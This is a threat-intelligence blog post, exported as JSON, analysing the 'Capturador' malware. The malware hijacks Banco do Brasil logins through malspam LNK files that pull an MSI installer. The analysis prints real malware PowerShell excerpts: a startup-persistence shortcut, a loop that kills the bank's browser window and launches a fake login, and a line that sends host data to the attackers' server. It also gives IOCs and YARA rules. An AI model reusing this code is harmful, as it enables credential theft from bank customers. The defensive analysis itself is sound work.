{"id":6947,"date":"2021-09-02T16:02:08","date_gmt":"2021-09-02T23:02:08","guid":{"rendered":"https:\/\/blogs.infoblox.com\/?p=6947"},"modified":"2024-08-07T12:19:20","modified_gmt":"2024-08-07T19:19:20","slug":"new-malware-capturador-hijacker","status":"publish","type":"post","link":"https:\/\/www.infoblox.com\/blog\/threat-intelligence\/malicious-activity-reports\/new-malware-capturador-hijacker\/","title":{"rendered":"New Malware: Capturador Hijacker"},"content":{"rendered":"<h3><strong>Author: Ma\u00ebl Le Touz<\/strong><\/h3>\n<p>&nbsp;<\/p>\n<h3>1. Executive Summary<\/h3>\n<p>Since 1 September, we have been tracking a malspam campaign distributing malware that we have not previously observed and has not been publicly reported on in the industry. The malware is a hijacker that we have named Capturador, and we believe that the campaign has been targeting speakers of Portuguese and small- and medium-sized Brazilian companies. The campaign\u2019s emails contain RAR archives as attachments and, in the subject lines, reference budget requests and incoming invoices. <\/p>\n<h3>2. Attack Chain<\/h3>\n<p>After decompressing the attachment, the victim is presented with a .lnk (LNK) file. Normally, LNK files are created by Microsoft Windows when a user creates a shortcut to a program or folder. Malspam actors have taken advantage of this feature by creating LNK files that contain URLs to a location of their choosing\u2014in the case of Capturador, to an Amazon Web Services (AWS) page that hosts a single malware installer packaged as a .msi (MSI) file:<\/p>\n<p><a href=\"\/wp-content\/uploads\/infoblox-blog-new-malware-capturador-hijacker-1.jpg\" data-lity><img decoding=\"async\" class=\"alignnone size-full wp-image-6844\" src=\"\/wp-content\/uploads\/infoblox-blog-new-malware-capturador-hijacker-1.jpg\" alt=\"\" \/><\/a><\/p>\n<p>When the victim clicks the LNK file, Windows connects to the payload server, downloads the malware installer to a system folder, and executes it by using Microsoft Installer (msiexec.exe):<br \/>\n<a href=\"\/wp-content\/uploads\/infoblox-blog-new-malware-capturador-hijacker-2.jpg\" data-lity><img decoding=\"async\" class=\"alignnone size-full wp-image-6844\" src=\"\/wp-content\/uploads\/infoblox-blog-new-malware-capturador-hijacker-2.jpg\" alt=\"\" \/><\/a><\/p>\n<p>The malware is packaged in an archive MSI file that contains two TOR executables, a PowerShell script, a custom PE32 executable, several DLLs, and a .config file. The DLLs are legitimate extensions for software libraries. TOR.exe is the main application for the Tor network; it allows individuals and machines to communicate with each other off the main internet, on an encrypted peer-to-peer network.<\/p>\n<p><a href=\"\/wp-content\/uploads\/infoblox-blog-new-malware-capturador-hijacker-3.jpg\" data-lity><img decoding=\"async\" class=\"alignnone size-full wp-image-6844\" src=\"\/wp-content\/uploads\/infoblox-blog-new-malware-capturador-hijacker-3.jpg\" alt=\"\" \/><\/a><br \/>\n<span><b>2.1. capturador.exe<\/b><span><br \/>\nThe capturador.exe executable is a 32-bit Windows application written in the version of .NET that requires version 4.7.2 of the .NET framework. On execution, capturador.exe displays a window that looks similar to the login screen for Banco do Brasil: <\/p>\n<p><a href=\"\/wp-content\/uploads\/infoblox-blog-new-malware-capturador-hijacker-4.jpg\" data-lity><img decoding=\"async\" class=\"alignnone size-full wp-image-6844\" src=\"\/wp-content\/uploads\/infoblox-blog-new-malware-capturador-hijacker-4.jpg\" alt=\"\" \/><\/a><\/p>\n<p>The actors thus attempt to trick the victim into typing the credentials and 2FA code within their application rather than a secure browser session with Banco do Brasil.<\/p>\n<p><span><b>2.2. ScrrDBBD.ps1<\/b><span><\/p>\n<p>This script is the entrypoint for the configuration and activation of the malware. Once the MSI file is unpacked and executed, ScrrDBBD.ps1 renames and hides the downloaded items, creates a service port on the local machine and gets it ready for Tor operations, creates a VBS artifact, executes it through another LNK file and the WScript utility bundled with Windows, and then sends the following back to the actors\u2019 command and control (C&#038;C): <\/p>\n<ul>\n<li>computer\u2019s name<\/li>\n<li>username<\/li>\n<li>current date<\/li>\n<li>a Boolean flag that is 1 if ScrrDBBD.ps1 found core: a process thought to be related to the installation of tor-gencert.exe<br \/>\nIf the flag is 0, ScrrDBBD.ps1 will not send it.<\/li>\n<\/ul>\n<p><code><br \/>\n$lnkFileName = \"$($env:APPDATA)\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\upspur.lnk\"<br \/>\n$WshShell = New-Object -ComObject WScript.Shell<br \/>\n$Shortcut = $WshShell.CreateShortcut($lnkFilename)<br \/>\n$Shortcut.TargetPath = $vbsPath<br \/>\n$Shortcut.WorkingDirectory = $newPath<br \/>\n$Shortcut.WindowStyle = 7<br \/>\n$Shortcut.Save()<br \/>\nStart-Process -FilePath $lnkFileName<br \/>\n$hasCore = \"No\"<br \/>\nGet-Process | Where-Object {<br \/>\n    if ($_.ProcessName -eq \"core\") {<br \/>\n   \t $hasCore = \"Yes\"<br \/>\n    }<br \/>\n}<br \/>\n$dataEnc = [System.Web.HttpUtility]::UrlEncode(\"$($env:COMPUTERNAME)|$($env:USERNAME)|$hasCore|$(Get-Date -Format `\"dd\/MM\/yyyy HH:mm`\")\")<br \/>\n$response = Invoke-WebRequest -UseBasicParsing -Uri \"https:\/\/$domain\/new.php?data=$dataEnc\"<br \/>\n<\/code><\/p>\n<p><span><b>2.3. monitor.ps1<\/b><span><br \/>\nThis PowerShell script runs silently and waits for the user to open a browser window with Banco do Brasil in the title. As soon as the window opens, the script terminates the browser and runs the capturador.exe application to trick the user into typing their username, password, and 2FA code into the application (rather than the browser). After the user types in this information, the script sends it through Tor to the domain controlled by the actors. <\/p>\n<p><code><br \/>\nfor(;;) {<br \/>\n   \t $processList = Get-Process | Select-Object Id,MainWindowTitle<br \/>\n   \t foreach($process in $processList) {<br \/>\n   \t\t $title = $process.MainWindowTitle<br \/>\n   \t\t if ($title -like \"*Banco do Brasil*\") {<br \/>\n   \t\t\t Stop-Process -Id $process.Id -Force<br \/>\n   \t\t\t if (!($capturerProcess -eq $null)) {<br \/>\n   \t\t\t\t Stop-Process -Id $capturerProcess.Id -Force<br \/>\n   \t\t\t }<br \/>\n   \t\t\t $capturerProcess = Start-Process -FilePath $args[0] -WorkingDirectory $args[1] -PassThru<br \/>\n   \t\t\t break<br \/>\n   \t\t }<br \/>\n   \t }<br \/>\n   \t Start-Sleep -Milliseconds 100<br \/>\n    }<br \/>\n}<br \/>\n<\/code><\/p>\n<h3>3. Conclusion and capabilities<\/h3>\n<p>Although Capturador\u2019s capabilities are limited to monitoring only a specific bank and to stealing login information, this malware is dangerous because it can cause financial damage. Based on the wording of the emails and on the URLs we have been monitoring, we believe that the campaign is targeting mainly small and medium enterprises in Brazil. Some of the scripts take runtime parameters, but most are hardcoded; this means the malware is tailored to target only users of Banco do Brasil.<\/p>\n<h3>4. Recommendations and mitigation<\/h3>\n<ul>\n<li>Deny Tor traffic on the network.<\/li>\n<li>Filter attachments to reduce the likelihood of malicious content reaching users\u2019 workstations.<\/li>\n<li>Screen attachments by converting them to PDF and then examining the converted versions. For example, one can convert Microsoft Office attachments to PDF documents and examine the PDFs to determine whether the original attachments are safe. This can be an effective method for neutralizing malicious content.<\/li>\n<li>Block password-protected files and archives, because email filters cannot decrypt and inspect their contents. Block all protected archives and encrypted attachments until they are deemed safe. <\/li>\n<li>Sanitize attachments to remove potentially harmful or active content, such as macros in Microsoft Office files, JavaScript, and links to executable downloads.<\/li>\n<li>Be aware of an attachment\u2019s file type, and never open an attachment that could be a script (typically a file with extension .vbs, .cmd, .bat, .lnk, or .scr), an internet shortcut file, or a compressed file. Threat actors use such files to (1) evade the detection methods that are based on file hashes and signatures and (2) mask the real malicious files from the filters that email services use to block attachments of specific file types.<\/li>\n<\/ul>\n<h3>5. Representative Indicators of Compromise (IOCs)<\/h3>\n<table>\n<tbody>\n<tr>\n<th style=\"border: 1px solid black; background-color: lightgray; text-align: center;padding-top:10px;\">Representative Indicators of Compromise (IOCs)<\/th>\n<th style=\"border: 1px solid black; background-color: lightgray; text-align: center;padding-top:10px;padding-right:10px;\">Description<\/th>\n<\/tr>\n<tr>\n<td>733720395d82114044d62b995f0b7d07073c912791b5d75add1d8aa209fa4e09<br \/>\ne643edf35609e08ea9f547af5f619b070dba4da1b777f3995398fb9ed1d1595b<br \/>\n3788611c7b786e107da74c44f5184c6f02f0ed2083009c89b2b30e23ede19482<br \/>\n3b177857eec0bb9e3fbae308d5071233a4672dcef312478122b2b08cf9ac7004<br \/>\n3335444a503e3c93e008dfcbe7c963b63cbd56978a87c73d14029619a4a7bbd3\n<\/td>\n<td>SHA256 hash of attached archives<\/td>\n<\/tr>\n<tr>\n<td>2e64babcb65b9731b7a8fbc83c0e1dd89e90388f754b51226e75f67f35257d1e<\/td>\n<td>Hash of MSI archive<\/td>\n<\/tr>\n<tr>\n<td>daba783c0b0e47ce3096ca6661e785467b5eb45147dd29c09b77c6b18b7a3d7e<\/td>\n<td>capturador.exe<\/td>\n<\/tr>\n<tr>\n<td>C:\\ProgramData\\Xopato\\capturador.exe<br \/>\n%programdata%\\7a260420<br \/>\n%programdata%\\hcore\n<\/td>\n<td>Installation artifacts<\/td>\n<\/tr>\n<tr>\n<td>a0e8801586250d318bf125e0bf53688cbaccc56258f709a750caf7f3b36d079d 89fa8c543adbb240658c579ae32444a014c89bfff242f8decc60d06a61956a1e<br \/>\n870061adb79918b5f8541cb23cef41aadba40f3ebeea84b8d2e44044b6861287<br \/>\n348bf30a24dfb9eba9ea9a4511ace5a852fd951afd75210de24e5bfba034facf<br \/>\n870061adb79918b5f8541cb23cef41aadba40f3ebeea84b8d2e44044b6861287<br \/>\neef6355b2dfb79cf5111070a31715525db72bd01ad6f8e69349c6dd022dca306\n<\/td>\n<td>Hashes of .lnk files<\/td>\n<\/tr>\n<tr>\n<td>eef8c513b78dbe60d5fd2793052f7b29151b96d53a513bf6f2a27ab205a64b14<\/td>\n<td>monitor.ps1<\/td>\n<\/tr>\n<tr>\n<td>755e2de647d6f525f91899af31a969f5e76f3b35432c9c1bfb1968c72080d9e6<\/td>\n<td>scrDDB.ps1<\/td>\n<\/tr>\n<tr>\n<td>https:\/\/viv8i1[.]s3[.]sa-east-1[.]amazonaws[.]com\/installer[.]msi<br \/>\nhttps:\/\/bit[.]ly\/3BxhJoP<br \/>\nhttps:\/\/s6j2b4[.]s3[.]sa-east-1[.]amazonaws[.]com\/installer[.]msi<br \/>\nhttps:\/\/a1l3dh[.]s3[.]sa-east-1[.]amazonaws[.]com\/installer[.]msi\n<\/td>\n<td>URLs for distributing the MSI package<\/td>\n<\/tr>\n<tr>\n<td>https:\/\/save[.]blockchain4c17[.]com<\/td>\n<td>C&#038;C server<\/td>\n<\/tr>\n<tr>\n<td>127[.0[.]0[.1:30900<\/td>\n<td>Local port opened<\/td>\n<\/tr>\n<tr>\n<td>%APPDATA%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\upspur.lnk<\/td>\n<td>Item created on the Windows Start menu<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<h3>6. YARA rule for detection<\/h3>\n<p><code><br \/>\n\/*<br \/>\n   YARA Rule Set<br \/>\n   Author: Infoblox<br \/>\n   Date: 2021-09-01<br \/>\n*\/<\/p>\n<p>\/* Rule Set ----------------------------------------------------------------- *\/<\/p>\n<p>rule monitor {<br \/>\n   meta:<br \/>\n  \tdescription = \"monitor.ps1\"<br \/>\n  \tauthor = \"Infoblox\"<br \/>\n  \tdate = \"2021-09-01\"<br \/>\n  \thash1 = \"eef8c513b78dbe60d5fd2793052f7b29151b96d53a513bf6f2a27ab205a64b14\"<br \/>\n   strings:<br \/>\n  \t$x1 = \"$dataEnc = [System.Web.HttpUtility]::UrlEncode(\\\"$data|0.0.0.0|$onionHost|$(Get-Date -Format `\\\"dd\/MM\/yyyy HH:mm`\\\")\\\")\" fullword ascii<br \/>\n  \t$s2 = \"$url = \\\"https:\/\/www2.bancobrasil.com.br\/aapf\/login.html#\/acesso-aapf-agencia-conta\\\"\" fullword ascii<br \/>\n  \t$s3 = \"$processList = Get-Process | Select-Object Id,MainWindowTitle\" fullword ascii<br \/>\n  \t$s4 = \"Stop-Process -Id $process.Id -Force\" fullword ascii<br \/>\n  \t$s5 = \"$onionHost = Get-Content -Path $onionHostPath\" fullword ascii<br \/>\n  \t$s6 = \"$data = Get-Content -Path $dataPath\" fullword ascii<br \/>\n  \t$s7 = \"$capturerProcess = Start-Process -FilePath $args[0] -WorkingDirectory $args[1] -PassThru\" fullword ascii<br \/>\n  \t$s8 = \"Start-Process $url\" fullword ascii<br \/>\n  \t$s9 = \"foreach($process in $processList) {\" fullword ascii<br \/>\n  \t$s10 = \"Start-Job -ArgumentList $capturerFileName,$(Get-Location) -ScriptBlock {\" fullword ascii<br \/>\n  \t$s11 = \"Stop-Process -Id $capturerProcess.Id -Force\" fullword ascii<br \/>\n  \t$s12 = \"$title = $process.MainWindowTitle\" fullword ascii<br \/>\n  \t$s13 = \"if (!($capturerProcess -eq $null)) {\" fullword ascii<br \/>\n  \t$s14 = \"$response = Invoke-WebRequest -UseBasicParsing -Uri \\\"https:\/\/$domain\/save.php?data=$dataEnc\\\"\" fullword ascii<br \/>\n  \t$s15 = \"$url = \\\"https:\/\/autoatendimento.bb.com.br\/apf-apj-acesso\/#\/transacao\/acesso-empresa\/0?v=2.28.10&t=1&tipoCliente=empresa\\\"\" fullword ascii<br \/>\n  \t$s16 = \"$capturerProcess = $null\" fullword ascii<br \/>\n  \t$s17 = \"Add-Type -AssemblyName System.Web\" fullword ascii<br \/>\n  \t$s18 = \"$onionHostPath = \\\"$($env:ProgramData)\\\\hscore\\\\hostname\\\"\" fullword ascii<br \/>\n  \t$s19 = \"For (;$data -eq \\\"\\\";) {\" fullword ascii<br \/>\n  \t$s20 = \"if ($data.substring(0, 2) -eq \\\"PJ\\\") {\" fullword ascii<br \/>\n   condition:<br \/>\n  \tuint16(0) == 0x6441 and filesize < 4KB and\n  \t1 of ($x*) and 4 of them\n}\n\nrule capturador {\n   meta:\n  \tdescription = \"capturador.exe\"\n  \tauthor = \"Infoblox\"\n  \tdate = \"2021-09-01\"\n  \thash1 = \"daba783c0b0e47ce3096ca6661e785467b5eb45147dd29c09b77c6b18b7a3d7e\"\n   strings:\n  \t$s1 = \"lSystem.Resources.ResourceReader, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089#System.Resources.R\" ascii\n  \t$s2 = \"capturador.exe\" fullword wide\n  \t$s3 = \"Acapturador, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null\" fullword ascii\n  \t$s4 = \"E:\\\\Work2021\\\\bb\\\\xxx\\\\v2\\\\capturador\\\\obj\\\\Release\\\\capturador.pdb\" fullword ascii\n  \t$s5 = \"    \t<requestedExecutionLevel level=\\\"asInvoker\\\" uiAccess=\\\"false\\\"\/>\" fullword ascii<br \/>\n  \t$s6 = \"PasswordBox_LostFocus\" fullword ascii<br \/>\n  \t$s7 = \"textBoxSenha_PasswordChanged\" fullword ascii<br \/>\n  \t$s8 = \"PasswordBox_GotFocus\" fullword ascii<br \/>\n  \t$s9 = \"  <assemblyIdentity version=\\\"1.0.0.0\\\" name=\\\"MyApplication.app\\\"\/>\" fullword ascii<br \/>\n  \t$s10 = \".NETFramework,Version=v4.7.2\" fullword ascii<br \/>\n  \t$s11 = \".NET Framework 4.7.2\" fullword ascii<br \/>\n  \t$s12 = \"base.png\" fullword wide<br \/>\n  \t$s13 = \" como deseja ser\" fullword ascii<br \/>\n  \t$s14 = \"ncia com o d\" fullword ascii<br \/>\n  \t$s15 = \"agencia\" fullword ascii<br \/>\n  \t$s16 = \"  <trustInfo xmlns=\\\"urn:schemas-microsoft-com:asm.v2\\\">\" fullword ascii<br \/>\n  \t$s17 = \"window1.baml\" fullword wide<br \/>\n  \t$s18 = \"window3.baml\" fullword wide<br \/>\n  \t$s19 = \"window4.baml\" fullword wide<br \/>\n  \t$s20 = \"CONFIRMAR\" fullword ascii<br \/>\n   condition:<br \/>\n  \tuint16(0) == 0x5a4d and filesize < 100KB and\n  \t8 of them\n}\n<\/code><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Author: Ma\u00ebl Le Touz &nbsp; 1. Executive Summary Since 1 September, we have been tracking a malspam campaign distributing malware that we have not previously observed and has not been publicly reported on in the industry. The malware is a hijacker that we have named Capturador, and we believe that the campaign has been targeting [&hellip;]<\/p>\n","protected":false},"author":397,"featured_media":6727,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"_acf_changed":false,"inline_featured_image":false,"_genesis_hide_title":false,"_genesis_hide_breadcrumbs":false,"_genesis_hide_singular_image":false,"_genesis_hide_footer_widgets":false,"_genesis_custom_body_class":"","_genesis_custom_post_class":"","_genesis_layout":"","footnotes":""},"categories":[555],"tags":[236,488,294,40,189],"class_list":{"0":"post-6947","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-malicious-activity-reports","8":"tag-cyberthreat","9":"tag-cyberthreat-intelligence-report","10":"tag-malspam","11":"tag-threat-intelligence","12":"tag-cybersecurity","13":"entry"},"acf":[],"yoast_head":"<!-- This site is optimized with the Yoast SEO Premium plugin v27.3 (Yoast SEO v27.3) - https:\/\/yoast.com\/product\/yoast-seo-premium-wordpress\/ -->\n<title>New Malware Activity Capturador Hijacker | Malicious Activity Report<\/title>\n<meta name=\"description\" content=\"nfoblox has observed a new malware campaign that acts as a hijacker. We believe the campaign is targeted towards speakers of Portuguese. Learn more.\" \/>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/www.infoblox.com\/blog\/threat-intelligence\/malicious-activity-reports\/new-malware-capturador-hijacker\/\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"New Malware: Capturador Hijacker\" \/>\n<meta property=\"og:description\" content=\"nfoblox has observed a new malware campaign that acts as a hijacker. We believe the campaign is targeted towards speakers of Portuguese. Learn more.\" \/>\n<meta property=\"og:url\" content=\"https:\/\/www.infoblox.com\/blog\/threat-intelligence\/malicious-activity-reports\/new-malware-capturador-hijacker\/\" \/>\n<meta property=\"og:site_name\" content=\"Infoblox Blog\" \/>\n<meta property=\"article:published_time\" content=\"2021-09-02T23:02:08+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2024-08-07T19:19:20+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/www.infoblox.com\/blog\/wp-content\/uploads\/ciu-image-21.jpg\" \/>\n\t<meta property=\"og:image:width\" content=\"612\" \/>\n\t<meta property=\"og:image:height\" content=\"343\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/jpeg\" \/>\n<meta name=\"author\" content=\"Infoblox Threat Intel\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"Infoblox Threat Intel\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"5 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/www.infoblox.com\\\/blog\\\/threat-intelligence\\\/malicious-activity-reports\\\/new-malware-capturador-hijacker\\\/#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/www.infoblox.com\\\/blog\\\/threat-intelligence\\\/malicious-activity-reports\\\/new-malware-capturador-hijacker\\\/\"},\"author\":{\"name\":\"Infoblox Threat Intel\",\"@id\":\"https:\\\/\\\/www.infoblox.com\\\/blog\\\/#\\\/schema\\\/person\\\/b6aed8965e3298a0817c16d32c0a67ae\"},\"headline\":\"New Malware: Capturador Hijacker\",\"datePublished\":\"2021-09-02T23:02:08+00:00\",\"dateModified\":\"2024-08-07T19:19:20+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/www.infoblox.com\\\/blog\\\/threat-intelligence\\\/malicious-activity-reports\\\/new-malware-capturador-hijacker\\\/\"},\"wordCount\":1129,\"publisher\":{\"@id\":\"https:\\\/\\\/www.infoblox.com\\\/blog\\\/#organization\"},\"image\":{\"@id\":\"https:\\\/\\\/www.infoblox.com\\\/blog\\\/threat-intelligence\\\/malicious-activity-reports\\\/new-malware-capturador-hijacker\\\/#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/www.infoblox.com\\\/blog\\\/wp-content\\\/uploads\\\/ciu-image-21.jpg\",\"keywords\":[\"Cyberthreat\",\"Cyberthreat intelligence report\",\"Malspam\",\"Threat Intelligence\",\"Cybersecurity\"],\"articleSection\":[\"Malicious Activity Reports\"],\"inLanguage\":\"en-US\"},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/www.infoblox.com\\\/blog\\\/threat-intelligence\\\/malicious-activity-reports\\\/new-malware-capturador-hijacker\\\/\",\"url\":\"https:\\\/\\\/www.infoblox.com\\\/blog\\\/threat-intelligence\\\/malicious-activity-reports\\\/new-malware-capturador-hijacker\\\/\",\"name\":\"New Malware Activity Capturador Hijacker | Malicious Activity Report\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/www.infoblox.com\\\/blog\\\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\\\/\\\/www.infoblox.com\\\/blog\\\/threat-intelligence\\\/malicious-activity-reports\\\/new-malware-capturador-hijacker\\\/#primaryimage\"},\"image\":{\"@id\":\"https:\\\/\\\/www.infoblox.com\\\/blog\\\/threat-intelligence\\\/malicious-activity-reports\\\/new-malware-capturador-hijacker\\\/#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/www.infoblox.com\\\/blog\\\/wp-content\\\/uploads\\\/ciu-image-21.jpg\",\"datePublished\":\"2021-09-02T23:02:08+00:00\",\"dateModified\":\"2024-08-07T19:19:20+00:00\",\"description\":\"nfoblox has observed a new malware campaign that acts as a hijacker. We believe the campaign is targeted towards speakers of Portuguese. Learn more.\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/www.infoblox.com\\\/blog\\\/threat-intelligence\\\/malicious-activity-reports\\\/new-malware-capturador-hijacker\\\/#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/www.infoblox.com\\\/blog\\\/threat-intelligence\\\/malicious-activity-reports\\\/new-malware-capturador-hijacker\\\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/www.infoblox.com\\\/blog\\\/threat-intelligence\\\/malicious-activity-reports\\\/new-malware-capturador-hijacker\\\/#primaryimage\",\"url\":\"https:\\\/\\\/www.infoblox.com\\\/blog\\\/wp-content\\\/uploads\\\/ciu-image-21.jpg\",\"contentUrl\":\"https:\\\/\\\/www.infoblox.com\\\/blog\\\/wp-content\\\/uploads\\\/ciu-image-21.jpg\",\"width\":612,\"height\":343,\"caption\":\"Cyber crime abstract concept. 3D shape and contour of skull icon on digital background. Computer attack and digital pirate symbol animation.\"},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/www.infoblox.com\\\/blog\\\/threat-intelligence\\\/malicious-activity-reports\\\/new-malware-capturador-hijacker\\\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/www.infoblox.com\\\/blog\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Infoblox Threat Intel\",\"item\":\"https:\\\/\\\/www.infoblox.com\\\/blog\\\/category\\\/threat-intelligence\\\/\"},{\"@type\":\"ListItem\",\"position\":3,\"name\":\"Malicious Activity Reports\",\"item\":\"https:\\\/\\\/www.infoblox.com\\\/blog\\\/category\\\/threat-intelligence\\\/malicious-activity-reports\\\/\"},{\"@type\":\"ListItem\",\"position\":4,\"name\":\"New Malware: Capturador Hijacker\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/www.infoblox.com\\\/blog\\\/#website\",\"url\":\"https:\\\/\\\/www.infoblox.com\\\/blog\\\/\",\"name\":\"infoblox.com\\\/blog\\\/\",\"description\":\"\",\"publisher\":{\"@id\":\"https:\\\/\\\/www.infoblox.com\\\/blog\\\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/www.infoblox.com\\\/blog\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/www.infoblox.com\\\/blog\\\/#organization\",\"name\":\"Infoblox\",\"url\":\"https:\\\/\\\/www.infoblox.com\\\/blog\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/www.infoblox.com\\\/blog\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"https:\\\/\\\/www.infoblox.com\\\/blog\\\/wp-content\\\/uploads\\\/infoblox-logo-2.svg\",\"contentUrl\":\"https:\\\/\\\/www.infoblox.com\\\/blog\\\/wp-content\\\/uploads\\\/infoblox-logo-2.svg\",\"width\":137,\"height\":30,\"caption\":\"Infoblox\"},\"image\":{\"@id\":\"https:\\\/\\\/www.infoblox.com\\\/blog\\\/#\\\/schema\\\/logo\\\/image\\\/\"}},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/www.infoblox.com\\\/blog\\\/#\\\/schema\\\/person\\\/b6aed8965e3298a0817c16d32c0a67ae\",\"name\":\"Infoblox Threat Intel\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/blogs.infoblox.com\\\/wp-content\\\/uploads\\\/avatar_user_397_1714162589-96x96.png\",\"url\":\"https:\\\/\\\/blogs.infoblox.com\\\/wp-content\\\/uploads\\\/avatar_user_397_1714162589-96x96.png\",\"contentUrl\":\"https:\\\/\\\/blogs.infoblox.com\\\/wp-content\\\/uploads\\\/avatar_user_397_1714162589-96x96.png\",\"caption\":\"Infoblox Threat Intel\"},\"description\":\"Infoblox Threat Intel is the leading creator of original DNS threat intelligence, distinguishing itself in a sea of aggregators. What sets us apart? Two things: mad DNS skills and unparalleled visibility. DNS is notoriously tricky to interpret and hunt from, but our deep understanding and unique access to the internet's inner workings allow us to track down threat actors that others can't see. We're proactive, not just defensive, using our insights to disrupt cybercrime where it begins. We also believe in sharing knowledge to support the broader security community by publishing detailed research and releasing indicators on GitHub. In addition, our intel is seamlessly integrated into our Infoblox Protective DNS solutions, so customers automatically get its benefits, along with ridiculously low false positive rates.\",\"url\":\"https:\\\/\\\/www.infoblox.com\\\/blog\\\/author\\\/infoblox-threat-intel\\\/\"}]}<\/script>\n<!-- \/ Yoast SEO Premium plugin. -->","yoast_head_json":{"title":"New Malware Activity Capturador Hijacker | Malicious Activity Report","description":"nfoblox has observed a new malware campaign that acts as a hijacker. We believe the campaign is targeted towards speakers of Portuguese. Learn more.","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/www.infoblox.com\/blog\/threat-intelligence\/malicious-activity-reports\/new-malware-capturador-hijacker\/","og_locale":"en_US","og_type":"article","og_title":"New Malware: Capturador Hijacker","og_description":"nfoblox has observed a new malware campaign that acts as a hijacker. We believe the campaign is targeted towards speakers of Portuguese. Learn more.","og_url":"https:\/\/www.infoblox.com\/blog\/threat-intelligence\/malicious-activity-reports\/new-malware-capturador-hijacker\/","og_site_name":"Infoblox Blog","article_published_time":"2021-09-02T23:02:08+00:00","article_modified_time":"2024-08-07T19:19:20+00:00","og_image":[{"width":612,"height":343,"url":"https:\/\/www.infoblox.com\/blog\/wp-content\/uploads\/ciu-image-21.jpg","type":"image\/jpeg"}],"author":"Infoblox Threat Intel","twitter_card":"summary_large_image","twitter_misc":{"Written by":"Infoblox Threat Intel","Est. reading time":"5 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/www.infoblox.com\/blog\/threat-intelligence\/malicious-activity-reports\/new-malware-capturador-hijacker\/#article","isPartOf":{"@id":"https:\/\/www.infoblox.com\/blog\/threat-intelligence\/malicious-activity-reports\/new-malware-capturador-hijacker\/"},"author":{"name":"Infoblox Threat Intel","@id":"https:\/\/www.infoblox.com\/blog\/#\/schema\/person\/b6aed8965e3298a0817c16d32c0a67ae"},"headline":"New Malware: Capturador Hijacker","datePublished":"2021-09-02T23:02:08+00:00","dateModified":"2024-08-07T19:19:20+00:00","mainEntityOfPage":{"@id":"https:\/\/www.infoblox.com\/blog\/threat-intelligence\/malicious-activity-reports\/new-malware-capturador-hijacker\/"},"wordCount":1129,"publisher":{"@id":"https:\/\/www.infoblox.com\/blog\/#organization"},"image":{"@id":"https:\/\/www.infoblox.com\/blog\/threat-intelligence\/malicious-activity-reports\/new-malware-capturador-hijacker\/#primaryimage"},"thumbnailUrl":"https:\/\/www.infoblox.com\/blog\/wp-content\/uploads\/ciu-image-21.jpg","keywords":["Cyberthreat","Cyberthreat intelligence report","Malspam","Threat Intelligence","Cybersecurity"],"articleSection":["Malicious Activity Reports"],"inLanguage":"en-US"},{"@type":"WebPage","@id":"https:\/\/www.infoblox.com\/blog\/threat-intelligence\/malicious-activity-reports\/new-malware-capturador-hijacker\/","url":"https:\/\/www.infoblox.com\/blog\/threat-intelligence\/malicious-activity-reports\/new-malware-capturador-hijacker\/","name":"New Malware Activity Capturador Hijacker | Malicious Activity 